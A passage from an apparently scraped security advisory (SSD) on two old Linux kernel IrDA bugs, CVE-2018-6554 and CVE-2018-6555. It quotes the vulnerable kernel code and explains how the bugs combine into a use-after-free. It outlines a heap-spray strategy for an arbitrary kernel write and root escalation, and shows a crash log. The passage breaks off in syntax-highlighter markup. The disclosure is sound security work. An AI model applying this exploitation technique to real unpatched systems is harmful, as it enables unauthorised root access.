{"id":13461,"date":"2018-09-27T14:19:15","date_gmt":"2018-09-27T22:19:15","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/09\/27\/news-7228\/"},"modified":"2018-09-27T14:19:15","modified_gmt":"2018-09-27T22:19:15","slug":"news-7228","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/09\/27\/news-7228\/","title":{"rendered":"SSD Advisory \u2013 IRDA Linux Driver UAF"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 27 Sep 2018 11:23:40 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two vulnerabilities in the Linux Kernel. By combining these two vulnerabilities a privilege escalation can be achieved. The two vulnerabilities are quite old, having been around for at least 17 years, and quite a few Long Term releases of Linux have them in their kernel. The assessment of the Linux kernel team is that they only pose a denial of service. That is incorrect: we provide proof here that they can be used to run code with a bit of effort and some luck (the probability of successfully gaining root privileges is above 50%).<\/p>\n<p><strong>Vendor Response<\/strong><br \/> &#8220;Memory leak in the irda_bind function in net\/irda\/af_irda.c and later in drivers\/staging\/irda\/net\/af_irda.c in the Linux kernel before 4.17 allows local users to cause a denial of service (memory consumption) by repeatedly binding an AF_IRDA socket. (CVE-2018-6554) The irda_setsockopt function in net\/irda\/af_irda.c and later in drivers\/staging\/irda\/net\/af_irda.c in the Linux kernel before 4.17 allows local users to cause a denial of service (ias_object use-after-free and system crash) or possibly have unspecified other impact via an AF_IRDA socket. 
(CVE-2018-6555)&#8221;<\/p>\n<p><a href=\"https:\/\/lists.ubuntu.com\/archives\/kernel-team\/2018-September\/095137.html\">https:\/\/lists.ubuntu.com\/archives\/kernel-team\/2018-September\/095137.html<\/a><\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-6554<br \/> CVE-2018-6555<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Mohamed\u00a0Ghannam,\u00a0has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3759\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> The vulnerability was introduced in 2.4.17 (21 Dec 2001), affecting all kernel versions up to 4.17 (IrDA subsystem was removed).<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The first bug has affected the IrDA socket since its birth in the Linux kernel; it relies on the general queue implementation called &#8220;hashbin&#8221;.<\/p>\n<p>Bug analysis:<\/p>\n<div id=\"crayon-5bad57622f33c387844270\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">static int irda_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len)\n{\n\u2026\n\u2026\n    self-&gt;ias_obj = irias_new_object(addr-&gt;sir_name, jiffies); \/* (1) *\/\n    err = -ENOMEM;\n    if (self-&gt;ias_obj == NULL)\n        goto out;\n\n    err = irda_open_tsap(self, addr-&gt;sir_lsap_sel, addr-&gt;sir_name); \/* (2) *\/\n    if (err &lt; 0) {\n        irias_delete_object(self-&gt;ias_obj);\n        self-&gt;ias_obj = NULL;\n        goto out;\n    }\n\n\u2026\n    irias_insert_object(self-&gt;ias_obj); \/* (3) *\/\n\n\u2026\n    return err;\n}<\/textarea><\/div>\n<\/div>\n<p>(1) &#8211; self-&gt;ias_obj takes the allocated object directly<br \/> (2) &#8211; as we understand it, this checks whether the socket is already bound<br \/> (3) &#8211; if not, the allocated object is inserted into the global hash table irias_objects, which keeps track of all allocated irias objects<\/p>\n<p>The problem is in (1): if we call bind() twice, self-&gt;ias_obj loses its reference to the first allocated object, so the socket can no longer free it, and the object persists in the irias_objects hash table. This of course allows us to exhaust the memory 
of the system. This will be useful when we combine it with another bug.<\/p>\n<p>Here is the other bug:<\/p>\n<div id=\"crayon-5bad57622f348074159794\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> static int 
irda_setsockopt(struct socket *sock, int level, int optname,\n        char __user *optval, unsigned int optlen) {\n\ncase IRLMP_IAS_SET:\n\u2026\n    \/* Find the object we target.\n     * If the user gives us an empty string, we use the object\n     * associated with this socket. This will workaround\n     * duplicated class name - Jean II *\/\n    if(ias_opt-&gt;irda_class_name[0] == '\\0') {\n        if(self-&gt;ias_obj == NULL) {\n            kfree(ias_opt);\n            err = -EINVAL;\n            goto out;\n        }\n        ias_obj = self-&gt;ias_obj; \/* (4) *\/\n\u2026\n    if((!capable(CAP_NET_ADMIN)) &amp;&amp;\n       ((ias_obj == NULL) || (ias_obj != self-&gt;ias_obj))) {\n        kfree(ias_opt);\n        err = -EPERM;\n        goto out;\n    }\n\u2026\n\u2026\n    irias_insert_object(ias_obj); \/* (5) *\/\n    kfree(ias_opt);\n    break;<\/textarea><\/div>\n<\/div>\n<p>(4) &#8211; the comment made by the developer is self-explanatory<br \/> (5) &#8211; the object is inserted into the queue<\/p>\n<p>The problem here is that we can insert the same object again. Insertion is only supposed to happen when a new object is created, or for an object already allocated by the user (via setsockopt), and only root can do this, so we can consider it a security bypass.<\/p>\n<p>Combining these two bugs, we can re-insert an object several times and free it later, which leaves a freed object in the irias_objects hash table.<\/p>\n<p>Exploiting this bug requires two things:<br \/> 1. Reliably spraying the heap to take control of the freed object<br \/> 2. 
A target pointer to be overwritten with user data; this can be achieved by leaking some kernel memory or by using global variables.<\/p>\n<p><em>1. Reliably spraying the heap to take control of the freed object<\/em><br \/> The freed object is allocated in kmalloc-96, so we need to find a good primitive to take control of it:<\/p>\n<div id=\"crayon-5bad57622f350229985963\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" 
class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">struct ias_object {\n    irda_queue_t q; \/* Must be first! *\/\n    magic_t magic;\n\n    char *name;\n    int id;\n    hashbin_t *attribs;\n};\n\nstruct irda_queue {\n    struct irda_queue *q_next;\n    struct irda_queue *q_prev;\n\n    char q_name[NAME_SIZE];\n    long q_hash; \/* Must be able to cast a (void *) *\/\n};<\/textarea><\/div>\n<\/div>\n<p>Our target is taking control of q_next and q_prev, which gives a good read\/write primitive through irias_insert_object(). Most of the known techniques, i.e. send(m)msg, msgsnd() and add_key(), will not work in our case: sendmsg\/msgsnd require a well-crafted header, and add_key() frees the payload when it finishes, corrupting our payload with a freelist pointer (and it zeroes the payload since commit 57070c850a03ee0cea654fc22cb8032fc3139d39).<\/p>\n<p>Luckily, the XFRM socket gives us a good primitive for making a consistent spray and controlling the top of our target object. Once we control the freed object, we have a write primitive to any kernel address.<\/p>\n<p>enqueue_first() is responsible for inserting a new object into the queue. Since we control the previously queued object, we can write a pointer (with controlled data) to any kernel memory, as shown below:<\/p>\n<div id=\"crayon-5bad57622f356016731601\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" 
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">static void enqueue_first(irda_queue_t **queue, irda_queue_t* element)\n{\n\u2026\n    } else {\n        \/*\n         * Queue is not empty. Insert element into front of queue.\n         *\/\n        element-&gt;q_next = (*queue);\n        (*queue)-&gt;q_prev-&gt;q_next = element; \/* &lt;\u2014\u2014 here : mov QWORD PTR [rdx],rbx *\/\n        element-&gt;q_prev = (*queue)-&gt;q_prev;\n        (*queue)-&gt;q_prev = element;\n        (*queue) = element;\n    }\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\"
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-1\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enqueue_first<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">irda_queue_t *<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_queue_t*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-3\">\u2026<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-4\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-6\"><span class=\"crayon-c\"> * Queue is not empty. Insert element into front of queue.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-7\"><span class=\"crayon-c\"> *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_next<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_next<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* &lt;\u2014\u2014 here : mov QWORD PTR [rdx],rbx *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-11\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-13\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-14\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>Here is the output:<\/p>\n<div id=\"crayon-5bad57622f35a338338997\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom:
12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\"
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">[ 3.899179] BUG: unable to handle kernel paging request at 00000000deadbeef\n[ 3.900038] IP: hashbin_insert+0x99\/0x150\n[ 3.900038] PGD 235eab067\n[ 3.900038] PUD 0\n[ 3.900038]\n[ 3.900038] Oops: 0002 [#1] SMP\n[ 3.900038] Modules linked in:\n[ 3.900038] CPU: 0 PID: 1036 Comm: xx Not tainted 4.10.0-rc8+ #6\n[ 3.900038] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04\/01\/2014\n[ 3.900038] task: ffff880234993ac0 task.stack: ffffc90001694000\n[ 3.900038] RIP: 0010:hashbin_insert+0x99\/0x150\n[ 3.900038] RSP: 0018:ffffc90001697dc0 EFLAGS: 00010082\n[ 3.900038] RAX: ffff880235f08318 RBX: ffff880235e73120 RCX: 0000000000000000\n[ 3.900038] RDX: 00000000deadbeef RSI: ffff880235585be9 RDI: ffff880235e73131\n[ 3.900038] RBP: ffffc90001697df0 R08: ffff88023fc1aaa0 R09: ffff8802349fa680\n[ 3.900038] R10: ffff880235fab420 R11: ffff880234993ac0 R12: ffff880235f08300\n[ 3.900038] R13: 0000000000000202 R14: 0000000000000003 R15: 0000000000000063\n[ 3.900038] FS: 0000000001d30880(0000) GS:ffff88023fc00000(0000) knlGS:0000000000000000\n[ 3.900038] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 3.900038] CR2: 00000000deadbeef CR3: 0000000235ea3000 CR4: 00000000000006f0\n[ 3.900038] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 3.900038] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 3.900038] Call Trace:\n[ 3.900038] irias_insert_object+0x19\/0x20\n[ 3.900038] irda_bind+0x17a\/0x1c0\n[ 3.900038] ? security_socket_bind+0x3e\/0x60\n[ 3.900038] SYSC_bind+0xb0\/0xe0\n[ 3.900038] ? vfs_write+0x155\/0x1b0\n[ 3.900038] ? do_nanosleep+0x56\/0xf0\n[ 3.900038] ? SyS_write+0x41\/0xa0\n[ 3.900038] SyS_bind+0x9\/0x10\n[ 3.900038] entry_SYSCALL_64_fastpath+0x13\/0x94\n[ 3.900038] RIP: 0033:0x44a117\n[ 3.900038] RSP: 002b:00007ffdb85d5f58 EFLAGS: 00000287 ORIG_RAX: 0000000000000031\n[ 3.900038] RAX: ffffffffffffffda RBX: 00000000006b68d8 RCX: 000000000044a117\n[ 3.900038] RDX: 0000000000000024 RSI: 00007ffdb85d5f90 RDI: 0000000000000006\n[ 3.900038] RBP: 0000000000000070 R08: 000000000048eb5a R09: 000000000000000c\n[ 3.900038] R10: 0000000000000000 R11: 0000000000000287 R12: 00000000006b6880\n[ 3.900038] R13: 0000000000000065 R14: 00000000006b68d8 R15: 0000000000000000\n[ 3.900038] Code: 8d 7b 10 ba 20 00 00 00 48 89 ce e8 42 bf af ff 49 63 c6 49 8d 04 c4 48 8b 50 10 48 85 d2 74 6e 48 89 13 48 8b 50 10 48 8b 52 08 &lt;48&gt; 89 1a 48 8b 50 10 48 8b 52 08 48 89 53 08 48 8b 50 10 48 89\n[ 3.900038] RIP: hashbin_insert+0x99\/0x150 RSP: ffffc90001697dc0\n[ 3.900038] CR2: 00000000deadbeef\n[ 3.900038] ---[ end trace 8a8070c4e016c09c ]---\n[ 3.900038] Kernel panic - not syncing: Fatal exception\n[ 3.900038] Kernel Offset: disabled\n[ 3.900038] Rebooting in 1 seconds..\n\n(gdb) x\/i hashbin_insert+0x99\n0xffffffff81847839 &lt;hashbin_insert+153&gt;: mov QWORD PTR [rdx],rbx<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\"
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.899179<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unable <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle <\/span><span class=\"crayon-e\">kernel <\/span><span class=\"crayon-e\">paging <\/span><span class=\"crayon-e\">request <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\"
id=\"crayon-5bad57622f35a338338997-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PGD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">235eab067<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PUD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Oops<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0002<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-p\">#1] 
SMP<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Modules <\/span><span class=\"crayon-e\">linked <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1036<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xx <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.10.0<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">rc8<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#6<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span
class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BIOS <\/span><span class=\"crayon-v\">Ubuntu<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1.8.2<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880234993ac0 <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001694000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-11\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">
<\/span><span class=\"crayon-cn\">0010<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-12\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0018<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffffc90001697dc0 <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00010082<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-13\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235f08318 <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235e73120 <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235585be9 <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880235e73131<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-15\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffc90001697df0 <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023fc1aaa0 <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff8802349fa680<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-16\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235fab420 <\/span><span 